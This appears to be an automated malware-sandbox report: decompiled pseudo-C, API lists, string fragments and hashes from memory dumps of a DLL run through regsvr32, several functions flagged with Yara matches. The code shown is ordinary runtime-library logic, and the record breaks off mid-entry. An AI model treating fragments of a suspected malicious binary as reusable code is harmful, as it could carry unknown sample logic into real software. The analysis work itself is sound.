String ID: #*9\$.-$DpY$E?b$FX$m!yq${`&F$u
API String ID: 0-2591828752
Opcode ID: 59df8465ec0652ffea0eb2e0c77569de975800b6e92395329ffff6d08f3d9baf
Instruction ID: 479501bf8952617cb053f1f5f7f5532052027f53c4ae18c355c694bd353bcc94
Opcode Fuzzy Hash: 59df8465ec0652ffea0eb2e0c77569de975800b6e92395329ffff6d08f3d9baf
Instruction Fuzzy Hash: B1A23C7054878A8BDB78CF24C845BEE7BE1FB84304F10452DE8A98A761EB749649DF42

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B072BF4 Relevance: 10.6, APIs: 7, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00007FFD7FFD2B072BF4(void* __edx, void* __rcx, void* __r8) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int _t11;
				signed int _t15;
				signed int _t19;
				void* _t26;
				signed long long _t38;
				signed long long _t39;
				signed long long* _t40;
				void* _t50;
				void* _t53;
				void* _t55;
				signed long long _t56;
				void* _t61;

				_t38 =  *0x2b0c70a0; // 0xf787487f4682
				_t39 = _t38 ^ _t56;
				 *(_t56 + 0xc0) = _t39;
				_t40 =  *((intOrPtr*)(_t56 + 0x130));
				_t26 = r9d;
				r12d = r8d;
				_t61 = __rcx;
				if (__edx != 1) goto 0x2b072d3c;
				r8d = _t26;
				 *(_t56 + 0x20) = 0x80;
				_t11 = E00007FFD7FFD2B0785C8(r12d, __edx - 1, _t40, __rcx, _t53, __r8, _t56 + 0x40);
				r13d = _t11;
				if (_t11 != 0) goto 0x2b072cb4;
				if (GetLastError() != 0x7a) goto 0x2b072cdb;
				 *(_t56 + 0x20) =  *(_t56 + 0x20) & 0;
				r9d = 0;
				r8d = _t26;
				if (E00007FFD7FFD2B0785C8(r12d, GetLastError() - 0x7a, _t40, __rcx, _t53, __r8, _t56 + 0x40) == 0) goto 0x2b072cdb;
				E00007FFD7FFD2B06796C(_t40, _t13, _t50, _t56 + 0x40, _t53, _t55);
				if (_t39 == 0) goto 0x2b072cdb;
				r8d = _t26;
				 *(_t56 + 0x20) = r13d;
				_t15 = E00007FFD7FFD2B0785C8(r12d, _t39, _t40, _t61, _t53, __r8, _t39);
				r13d = _t15;
				if (_t15 == 0) goto 0x2b072cd3;
				E00007FFD7FFD2B06796C(_t40, r13d, _t50, _t39, r13d, _t55);
				 *_t40 = _t39;
				if (_t39 != 0) goto 0x2b072d00;
				if (1 == 0) goto 0x2b072cdb;
				free(??);
				return E00007FFD7FFD2B064980(_t19,  *(_t56 + 0xc0) ^ _t56, _t50, __r8);
			}

0x7ffd2b072c06
0x7ffd2b072c0d
0x7ffd2b072c10
0x7ffd2b072c18
0x7ffd2b072c20
0x7ffd2b072c23
0x7ffd2b072c26
0x7ffd2b072c2c
0x7ffd2b072c37
0x7ffd2b072c44
0x7ffd2b072c4c
0x7ffd2b072c51
0x7ffd2b072c56
0x7ffd2b072c61
0x7ffd2b072c63
0x7ffd2b072c67
0x7ffd2b072c6a
0x7ffd2b072c7d
0x7ffd2b072c85
0x7ffd2b072c90
0x7ffd2b072c95
0x7ffd2b072ca3
0x7ffd2b072ca8
0x7ffd2b072cad
0x7ffd2b072cb2
0x7ffd2b072cbf
0x7ffd2b072cc7
0x7ffd2b072ccd
0x7ffd2b072cd1
0x7ffd2b072cd6
0x7ffd2b072cff

APIs

GetLastError.KERNEL32 ref: 00007FFD2B072C58

Part of subcall function 00007FFD2B06796C: Sleep.KERNEL32(?,?,?,00007FFD2B067F0B,?,?,?,00007FFD2B0676A1,?,?,?,?,00007FFD2B065382), ref: 00007FFD2B0679B1

free.LIBCMT ref: 00007FFD2B072CD6
free.LIBCMT ref: 00007FFD2B072D1D
GetLocaleInfoW.KERNEL32 ref: 00007FFD2B072D54
GetLocaleInfoW.KERNEL32 ref: 00007FFD2B072D7E
free.LIBCMT ref: 00007FFD2B072D8B
GetLocaleInfoW.KERNEL32 ref: 00007FFD2B072DB6

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: InfoLocalefree$ErrorLastSleep
String ID:
API String ID: 3746651342-0
Opcode ID: e47d10a84406a34633a24b679209866e5097282d3bb8e6c5d4316b0a21244243
Instruction ID: 70c6c48f5822e72215dfd1d26043506110814c9041cb1b328bac98035abdfbc0
Opcode Fuzzy Hash: e47d10a84406a34633a24b679209866e5097282d3bb8e6c5d4316b0a21244243
Instruction Fuzzy Hash: 39511421B0A74642F7665B216E2577AA2C0FF9BB84F004031DE8D477A5EEBCE805B780

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003F54 Relevance: 10.3, Strings: 8, Instructions: 262COMMON

Download Yara Rule

Strings

#X, xrefs: 000000018000409E
rs, xrefs: 00000001800040BF
U, xrefs: 000000018000431B
Q", xrefs: 000000018000406C
;Q, xrefs: 0000000180004236
-T, xrefs: 0000000180004288
*13B, xrefs: 000000018000411B
+, xrefs: 00000001800041B6

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$*13B$+$;Q$Q"$U$rs$-T
API String ID: 0-544282628
Opcode ID: d1854a6999c0ff55486a99b7506505f72410f9acb5c25179dc35c12dc5b3fa06
Instruction ID: 1b0f9965968cc2688a71ad85e1ceaa8c66d891cfd0c5e8919ebd8b935f04e68c
Opcode Fuzzy Hash: d1854a6999c0ff55486a99b7506505f72410f9acb5c25179dc35c12dc5b3fa06
Instruction Fuzzy Hash: 53C1197190474D8FDF48DF68C8896EE7BB1FB48358F16431DE84AA6290C7789A48CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0691F4 Relevance: 9.1, APIs: 6, Instructions: 80
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 62%

			E00007FFD7FFD2B0691F4(signed int __ecx, signed int __edx, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
				void* _t37;
				void* _t38;
				int _t40;
				signed long long _t61;
				long long _t63;
				_Unknown_base(*)()* _t81;
				void* _t85;
				void* _t86;
				void* _t88;
				signed long long _t89;
				struct _EXCEPTION_POINTERS* _t96;

				 *((long long*)(_t88 + 0x10)) = __rbx;
				 *((long long*)(_t88 + 0x18)) = __rsi;
				_t86 = _t88 - 0x4f0;
				_t89 = _t88 - 0x5f0;
				_t61 =  *0x2b0c70a0; // 0xf787487f4682
				 *(_t86 + 0x4e0) = _t61 ^ _t89;
				if (__ecx == 0xffffffff) goto 0x2b069233;
				_t38 = E00007FFD7FFD2B068CFC(_t37);
				 *(_t89 + 0x70) =  *(_t89 + 0x70) & 0x00000000;
				r8d = 0x94;
				E00007FFD7FFD2B0656D0(_t38, __ecx, 0, _t89 + 0x74, __rdx, __r8);
				_t63 = _t86 + 0x10;
				 *((long long*)(_t89 + 0x48)) = _t89 + 0x70;
				 *((long long*)(_t89 + 0x50)) = _t63;
				__imp__RtlCaptureContext();
				r8d = 0;
				0x2b07e276();
				if (_t63 == 0) goto 0x2b0692ba;
				 *(_t89 + 0x38) =  *(_t89 + 0x38) & 0x00000000;
				 *((long long*)(_t89 + 0x30)) = _t89 + 0x60;
				 *((long long*)(_t89 + 0x28)) = _t89 + 0x58;
				 *((long long*)(_t89 + 0x20)) = _t86 + 0x10;
				0x2b07e270();
				goto 0x2b0692d6;
				 *((long long*)(_t86 + 0x108)) =  *((intOrPtr*)(_t86 + 0x508));
				 *((long long*)(_t86 + 0xa8)) = _t86 + 0x508;
				 *(_t89 + 0x70) = __edx;
				 *((intOrPtr*)(_t89 + 0x74)) = r8d;
				 *((long long*)(_t86 - 0x80)) =  *((intOrPtr*)(_t86 + 0x508));
				_t40 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t81, _t85);
				if (UnhandledExceptionFilter(_t96) != 0) goto 0x2b069318;
				if (_t40 != 0) goto 0x2b069318;
				if (__ecx == 0xffffffff) goto 0x2b069318;
				E00007FFD7FFD2B068CFC(_t42);
				return E00007FFD7FFD2B064980(__ecx,  *(_t86 + 0x4e0) ^ _t89,  *((intOrPtr*)(_t89 + 0x40)),  *((intOrPtr*)(_t86 + 0x108)));
			}

0x7ffd2b0691f4
0x7ffd2b0691f9
0x7ffd2b069202
0x7ffd2b06920a
0x7ffd2b069211
0x7ffd2b06921b
0x7ffd2b06922c
0x7ffd2b06922e
0x7ffd2b069233
0x7ffd2b06923f
0x7ffd2b069245
0x7ffd2b06924f
0x7ffd2b069257
0x7ffd2b06925c
0x7ffd2b069261
0x7ffd2b069276
0x7ffd2b069279
0x7ffd2b069281
0x7ffd2b069283
0x7ffd2b069293
0x7ffd2b0692a0
0x7ffd2b0692ac
0x7ffd2b0692b3
0x7ffd2b0692b8
0x7ffd2b0692c1
0x7ffd2b0692cf
0x7ffd2b0692dd
0x7ffd2b0692e1
0x7ffd2b0692e5
0x7ffd2b0692e9
0x7ffd2b0692f3
0x7ffd2b069306
0x7ffd2b06930a
0x7ffd2b06930f
0x7ffd2b069313
0x7ffd2b06933e

APIs

RtlCaptureContext.KERNEL32 ref: 00007FFD2B069261
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFD2B069279
RtlVirtualUnwind.KERNEL32 ref: 00007FFD2B0692B3
IsDebuggerPresent.KERNEL32 ref: 00007FFD2B0692E9
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFD2B0692F3
UnhandledExceptionFilter.KERNEL32 ref: 00007FFD2B0692FE

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: f8ac7c2c7cda7271dc3ccd891163401566f153f4bfaa5bbaeb3659fbeae6fd48
Instruction ID: 82a1f83bda54a0483ce3c30ae683fd37b1d0aae5f6650ab1fe0365c9192efaa2
Opcode Fuzzy Hash: f8ac7c2c7cda7271dc3ccd891163401566f153f4bfaa5bbaeb3659fbeae6fd48
Instruction Fuzzy Hash: 2D31B332B09B828AEB21CF25E9502AE73A4FB89754F500135EB9C43BA9DF78D545DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0777EC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00007FFD7FFD2B0777EC(void* __ecx, void* __rax, long long __rbx, char* __rcx, void* __rdx, intOrPtr _a8, long long _a16) {
				void* _t31;

				_t31 = __rax;
				_a16 = __rbx;
				if (__rcx == 0) goto 0x2b077854;
				if ( *__rcx == 0) goto 0x2b077854;
				if (E00007FFD7FFD2B0657E0(__ecx, __rcx, 0x2b085bc8) == 0) goto 0x2b077854;
				if (E00007FFD7FFD2B0657E0(__ecx, __rcx, 0x2b085bc4) != 0) goto 0x2b07784a;
				_t3 = _t31 + 2; // 0x2
				r9d = _t3;
				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x2b077871;
				goto 0x2b077883;
				E00007FFD7FFD2B0750DC(_a8, 0x2b085bc4);
				goto 0x2b077883;
				r9d = 2;
				if (GetLocaleInfoW(??, ??, ??, ??) != 0) goto 0x2b077875;
				goto 0x2b077883;
				if (_a8 != 0) goto 0x2b077883;
				return GetACP();
			}

0x7ffd2b0777ec
0x7ffd2b0777ec
0x7ffd2b0777ff
0x7ffd2b077804
0x7ffd2b077814
0x7ffd2b077827
0x7ffd2b07782c
0x7ffd2b07782c
0x7ffd2b077842
0x7ffd2b077848
0x7ffd2b07784d
0x7ffd2b077852
0x7ffd2b07785c
0x7ffd2b07786f
0x7ffd2b077873
0x7ffd2b07787b
0x7ffd2b07788d

APIs

GetLocaleInfoW.KERNEL32 ref: 00007FFD2B07783A
GetLocaleInfoW.KERNEL32 ref: 00007FFD2B077867
GetACP.KERNEL32 ref: 00007FFD2B07787D

Strings

OCP, xrefs: 00007FFD2B077816
ACP, xrefs: 00007FFD2B077806

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 301b7c4afa546ac5c3d39052bd75fd4e0d94975dcd251de3196dc1da9b2f33c7
Instruction ID: 5bae1a1d0164e306dcbac7017f5dc61782454bfacc25aae2ca4d205a422b5f25
Opcode Fuzzy Hash: 301b7c4afa546ac5c3d39052bd75fd4e0d94975dcd251de3196dc1da9b2f33c7
Instruction Fuzzy Hash: 6E118E30B1E64386FB9B9B61EE206796291EF46784F545070DA0E475B1DEACF904F7C0

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180021094 Relevance: 8.0, Strings: 6, Instructions: 486COMMON

Download Yara Rule

Strings

id, xrefs: 00000001800212A8
%c, xrefs: 0000000180021714
/=[U, xrefs: 00000001800215AB
a, xrefs: 000000018002143E
.vnW, xrefs: 0000000180021151
rx, xrefs: 00000001800216E9

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: %c$.vnW$/=[U$a$id$rx
API String ID: 0-1294002034
Opcode ID: 1e5ae35585031cd08f0de0970174a96ed6834a92f600fd8be4157363364f8142
Instruction ID: 9862d3b8b7ec747793e7a5ad174fbfa0e6e6e1c1e82e7330e5487f23fe84a42b
Opcode Fuzzy Hash: 1e5ae35585031cd08f0de0970174a96ed6834a92f600fd8be4157363364f8142
Instruction Fuzzy Hash: 6A32F2B1500789DBDB9CCF68C88A59E7FB1FF44398FA0521DFA0296290C7B5D985CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180026518 Relevance: 7.9, Strings: 6, Instructions: 431COMMON

Download Yara Rule

Strings

{, xrefs: 0000000180026E60
%D, xrefs: 0000000180026B76
J/@, xrefs: 0000000180026968
]$, xrefs: 0000000180026536
Y7, xrefs: 0000000180026DE1
^*{(, xrefs: 000000018002674D

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: %D$J/@$]$$^*{(${$Y7
API String ID: 0-597640275
Opcode ID: 96cc6b87b748fd33b30a0af38629acd40fb34a28ecd0b063911ea826c221f98d
Instruction ID: 8c2740cc35e8c14bf920cbf465cbbd1875e33698a1d588601d56ef32eb9cc919
Opcode Fuzzy Hash: 96cc6b87b748fd33b30a0af38629acd40fb34a28ecd0b063911ea826c221f98d
Instruction Fuzzy Hash: 3042D3709093C88BDBF9CF24C8897CD7BF0FF48344F90555A984E9A694DBB866858F42

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001238C Relevance: 7.7, Strings: 6, Instructions: 210COMMON

Download Yara Rule

Strings

joGh, xrefs: 0000000180012649
p_", xrefs: 0000000180012486
^~, xrefs: 0000000180012437
tJ, xrefs: 00000001800126B6
dr, xrefs: 0000000180012626
(, xrefs: 00000001800125DC

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ^~$dr$joGh$tJ$($p_"
API String ID: 0-4105225594
Opcode ID: af3df956917a512f8613edff7383cda619c13abcbb7c3493aeab3f72f305b792
Instruction ID: 8f19cce05f5bb365736b2413bcfc34a5b4e4e077a0ab751c2a2f7d1293ea4f50
Opcode Fuzzy Hash: af3df956917a512f8613edff7383cda619c13abcbb7c3493aeab3f72f305b792
Instruction Fuzzy Hash: C9B1F070D0470D8BDF98CFA8D48A6DEBBF0FB08344F108129E416B6290D7789A49CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B077A88 Relevance: 7.7, APIs: 5, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00007FFD7FFD2B077A88(void* __ecx, void* __edx, void* __eflags, long long __rbx, void* __rcx, void* __rdx, void* __rsi, long long __rbp, void* __r8, void* __r9, long long _a16, long long _a24) {
				void* _v8;
				signed int _v24;
				char _v152;
				char _v168;
				signed int _t62;
				signed int _t72;
				signed int _t85;
				signed int _t92;
				signed long long _t141;
				signed long long _t142;
				signed long long _t165;
				void* _t169;

				_a16 = __rbx;
				_a24 = __rbp;
				_t141 =  *0x2b0c70a0; // 0xf787487f4682
				_t142 = _t141 ^ _t169 - 0x000000c0;
				_v24 = _t142;
				E00007FFD7FFD2B067F5C(__ecx, __eflags, _t142, __rcx, __rsi, __r8);
				_t165 = _t142;
				_t62 = E00007FFD7FFD2B0778B8(__rcx, __rdx, __r9);
				r9d = 0x78;
				asm("sbb edx, edx");
				_t92 = _t62;
				if (GetLocaleInfoA(??, ??, ??, ??) != 0) goto 0x2b077b00;
				 *(_t165 + 0x150) = 0;
				goto 0x2b077d30;
				if (E00007FFD7FFD2B07A374(_t142,  *((intOrPtr*)(_t165 + 0x148))) != 0) goto 0x2b077bf8;
				r9d = 0x78;
				asm("sbb edx, edx");
				if (GetLocaleInfoA(??, ??, ??, ??) == 0) goto 0x2b077af0;
				if (E00007FFD7FFD2B07A374(_t142,  *((intOrPtr*)(_t165 + 0x140))) != 0) goto 0x2b077b70;
				 *(_t165 + 0x150) =  *(_t165 + 0x150) | 0x00000304;
				 *(_t165 + 0x160) = _t92;
				goto 0x2b077bf2;
				if (( *(_t165 + 0x150) & 0x00000002) != 0) goto 0x2b077bf8;
				if ( *((intOrPtr*)(_t165 + 0x154)) == 0) goto 0x2b077bc6;
				if (E00007FFD7FFD2B07A508(_t142,  *((intOrPtr*)(_t165 + 0x140))) != 0) goto 0x2b077bc6;
				 *(_t165 + 0x150) =  *(_t165 + 0x150) | 0x00000002;
				 *(_t165 + 0x164) = _t92;
				if (E00007FFD7FFD2B0653B0(_t70,  *((intOrPtr*)(_t165 + 0x140))) !=  *((intOrPtr*)(_t165 + 0x154))) goto 0x2b077bf8;
				 *(_t165 + 0x160) = _t92;
				goto 0x2b077bf8;
				_t72 =  *(_t165 + 0x150);
				if ((_t72 & 0x00000001) != 0) goto 0x2b077bf8;
				if (_t92 ==  *0x2b085bb0) goto 0x2b077bf8;
				if (1 - 0xa < 0) goto 0x2b077bd9;
				 *(_t165 + 0x150) = _t72 | 0x00000001;
				 *(_t165 + 0x164) = _t92;
				if (( *(_t165 + 0x150) & 0x00000300) == 0x300) goto 0x2b077d22;
				r9d = 0x78;
				asm("sbb edx, edx");
				if (GetLocaleInfoA(??, ??, ??, ??) == 0) goto 0x2b077af0;
				if (E00007FFD7FFD2B07A374(_t142,  *((intOrPtr*)(_t165 + 0x140))) != 0) goto 0x2b077cc0;
				asm("bts dword [edi+0x150], 0x9");
				if ( *((intOrPtr*)(_t165 + 0x158)) == 0) goto 0x2b077c75;
				asm("bts eax, 0x8");
				goto 0x2b077cb0;
				if ( *((intOrPtr*)(_t165 + 0x154)) == 0) goto 0x2b077ca8;
				if (E00007FFD7FFD2B0653B0( *(_t165 + 0x150),  *((intOrPtr*)(_t165 + 0x140))) !=  *((intOrPtr*)(_t165 + 0x154))) goto 0x2b077ca8;
				_t45 = _t165 + 0x140; // 0x140
				if (E00007FFD7FFD2B0779F8(_t92, 1, __rcx, __rsi, __rbp, _t45) == 0) goto 0x2b077d22;
				asm("bts dword [edi+0x150], 0x8");
				if ( *(_t165 + 0x160) != 0) goto 0x2b077d22;
				 *(_t165 + 0x160) = _t92;
				goto 0x2b077d22;
				if ( *((intOrPtr*)(_t165 + 0x158)) != 0) goto 0x2b077d22;
				if ( *((intOrPtr*)(_t165 + 0x154)) == 0) goto 0x2b077d22;
				if (E00007FFD7FFD2B07A374(_t142,  *((intOrPtr*)(_t165 + 0x140))) != 0) goto 0x2b077d22;
				_t52 = _t142 + 2; // 0x2
				r9d = _t52;
				asm("bts ecx, 0xa");
				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x2b077d22;
				_t85 =  *(_t165 + 0x160);
				asm("bts dword [edi+0x150], 0x8");
				_t86 =  ==  ? _t92 : _t85;
				 *(_t165 + 0x160) =  ==  ? _t92 : _t85;
				return E00007FFD7FFD2B064980(_t92 & 0x000003ff, _v24 ^ _t169 - 0x000000c0,  &_v152,  &_v168);
			}

0x7ffd2b077a88
0x7ffd2b077a8d
0x7ffd2b077a9a
0x7ffd2b077aa1
0x7ffd2b077aa4
0x7ffd2b077aaf
0x7ffd2b077ab7
0x7ffd2b077aba
0x7ffd2b077acc
0x7ffd2b077ad2
0x7ffd2b077ad6
0x7ffd2b077aee
0x7ffd2b077af0
0x7ffd2b077afb
0x7ffd2b077b13
0x7ffd2b077b24
0x7ffd2b077b2e
0x7ffd2b077b44
0x7ffd2b077b59
0x7ffd2b077b5b
0x7ffd2b077b65
0x7ffd2b077b6b
0x7ffd2b077b77
0x7ffd2b077b7f
0x7ffd2b077b9b
0x7ffd2b077ba4
0x7ffd2b077bab
0x7ffd2b077bbc
0x7ffd2b077bbe
0x7ffd2b077bc4
0x7ffd2b077bc6
0x7ffd2b077bce
0x7ffd2b077bdc
0x7ffd2b077be7
0x7ffd2b077bec
0x7ffd2b077bf2
0x7ffd2b077c07
0x7ffd2b077c18
0x7ffd2b077c22
0x7ffd2b077c38
0x7ffd2b077c51
0x7ffd2b077c53
0x7ffd2b077c67
0x7ffd2b077c69
0x7ffd2b077c73
0x7ffd2b077c7b
0x7ffd2b077c8f
0x7ffd2b077c91
0x7ffd2b077ca6
0x7ffd2b077ca8
0x7ffd2b077cb6
0x7ffd2b077cb8
0x7ffd2b077cbe
0x7ffd2b077cc6
0x7ffd2b077cce
0x7ffd2b077ce3
0x7ffd2b077ce7
0x7ffd2b077ce7
0x7ffd2b077cfb
0x7ffd2b077d07
0x7ffd2b077d09
0x7ffd2b077d0f
0x7ffd2b077d19
0x7ffd2b077d1c
0x7ffd2b077d54

APIs

_getptd.LIBCMT ref: 00007FFD2B077AAF

Part of subcall function 00007FFD2B067F5C: _amsg_exit.LIBCMT ref: 00007FFD2B067F72

GetLocaleInfoA.KERNEL32 ref: 00007FFD2B077AE4
GetLocaleInfoA.KERNEL32 ref: 00007FFD2B077B3C
GetLocaleInfoA.KERNEL32 ref: 00007FFD2B077C30

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: InfoLocale$_amsg_exit_getptd
String ID:
API String ID: 3133215516-0
Opcode ID: 011128502a0fcc3ad770cc1debbaac42b99c0b0c360a2ccdac90c21ca37e0867
Instruction ID: d1c8edb7f373274783b81a92c1bcdba3e220c7aaaf22e4b01fbb975192d69f9d
Opcode Fuzzy Hash: 011128502a0fcc3ad770cc1debbaac42b99c0b0c360a2ccdac90c21ca37e0867
Instruction Fuzzy Hash: 0C719232B06A8697E75A8B21DE647E9B390FB89785F404035D719872A1DF7CF424E780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B068C48 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFD2B068C7F
GetCurrentProcessId.KERNEL32 ref: 00007FFD2B068C8A
GetCurrentThreadId.KERNEL32 ref: 00007FFD2B068C96
GetTickCount.KERNEL32 ref: 00007FFD2B068CA2
QueryPerformanceCounter.KERNEL32 ref: 00007FFD2B068CB3

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: e892d1ca8605c0ae0c54fd9a0726e05f56c62d7c77bff685124484777f3dcf30
Instruction ID: d9493ddb6b3eb73a04dc3fef86df1c3e6a86de06dc7697cb3e6d01379cb0c75a
Opcode Fuzzy Hash: e892d1ca8605c0ae0c54fd9a0726e05f56c62d7c77bff685124484777f3dcf30
Instruction Fuzzy Hash: 5501A12171AF0585E7828F21EE602652360FB4ABA0F942530EE9E077F0DF7CED85A740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180024788 Relevance: 6.7, Strings: 5, Instructions: 428COMMON

Download Yara Rule

Strings

J7, xrefs: 0000000180024CBE
&, xrefs: 0000000180025069
%, xrefs: 00000001800248BD
3, xrefs: 0000000180025129
;cL, xrefs: 0000000180024BDA

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
